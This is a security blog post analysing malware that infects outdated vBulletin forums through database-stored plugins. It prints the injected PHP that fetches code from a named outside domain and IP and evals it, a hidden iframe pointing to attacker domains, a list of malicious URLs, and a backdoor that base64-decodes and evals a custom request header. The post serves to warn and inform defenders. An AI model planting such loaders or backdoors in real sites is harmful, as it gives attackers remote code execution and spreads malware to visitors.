Blog
Categories

vBulletin Vulnerability and Malware Exploit

Rollins Orlu By Rollins Orlu on Jul 6, 2013 in Security
VBulletin is a publishing suite that allows users create and publish a variety of content, including: forums, blogs, and polls. If you currently use an older version of this application on your website, you might be opening up your site to an attack as some serious security vulnerabilities exist in older versions, which could result in sites using older versions of the software that are not properly updated, getting infected with malware.

270px-VBulletin.svg

Technical Details

Unlike Wordpress, Drupal, and Joomla, vBulletin stores templates and plugin content in the database, and it is exactly this characteristic that is being exploited by the malware. The malware hides itself inside the database using the Plugin system, and injects code into “global_start”, so it is called on every page request: 
$d = 'front.adabeupdate.com';
$ip = '91.220.173.170';

ob_start(); 

$datad = getdata('http://' . $d . '/ss?t=f&' . $str);

if ($datad === false) { $datad = getdata('http://' . 

$ip . '/ss?t=f&' . $str); }

if (eval($datad) === false) { print $datad; }

$template_hook['forcehf'] = ob_get_contents();

ob_end_clean();

... where getdata is just a wrap around curl.
 

For instance, in the injected PHP file above, the host website retrieves data from  "front.adabeupdate.com" and displays this data to the end user, which allows the malware to be injected to the forum pages and downloaded to the visitors of the Web site through iFrames.

Analysis of the attack

The manner in which vBulletin stores template and plugin content makes it a bit more complicated for webmasters, as they need to use phpMyAdmin or another database tool to try to find and fix such issues. The code used in the attack is remotely generated, and changes very often, but follows a similar format: iFrames similar to the one below load content from a random domain on port 36 or 38. 
<iframe src="httx://bv5g.gabparenting .com:36/hot.php
height="1" width="1" frameborder="0"


style=" visibility:hidden; position:absolute"></iframe>
 

Here's a list of some domains that have been used so far in this attack:

  • http://grh5.intorcio.com:38/mean.php
  • http://rht5.justgabit.com:36/hot.php
  • http://bv5g.gabparenting.com:36/hot.php
  • http://ferh4.gabmoms.com:36/hot.php
  • http://rgh5.gabofporn.com:36/hot.php
  • http://sef3.gabfashion.com:36/hot.php
  • http://grg5.gabbrazil.com:36/hot.php
  • http://fth5.gabafly.com:36/hot.php
  • http://fegr4.tampabaypostcarbon.com:38/mean.php
  • http://drh4.secularflorida.org:38/mean.php
  • http://hrtj5.suncoasthumanist.com:38/mean.php
  • http://sef3.instantpartyanddj.com:38/mean.php
  • http://grh5.intorcio.com:38/mean.php
  • http://ym55.gabandroid.com:36/hot.php
  • http://rg56.benpoch.com:36/hot.php
  • http://drg4.gab.me:36/hot.php (95.141.37.119)
 
Another interesting aspect of this attack is a backdoor that uses a custom header sent by the client called HTTP_ECMDE, instead of a POST or GET request. Whenever it finds that header, it base64 decodes and evals (executes) it: 
if ($_SERVER["HTTP_ECMDE"]) {

        eval( base64_decode( $_SERVER["HTTP_ECMDE"]));

        return;

}
 

It isn't quite clear the extent of the exploit, however, hundreds of websites have been reported to be affected, with Google indexing more than 15,000 pages that display an error indicative of the attack.

Comments

No comments yet.

Leave a comment

Comments are moderated. Your comment may appear after approval.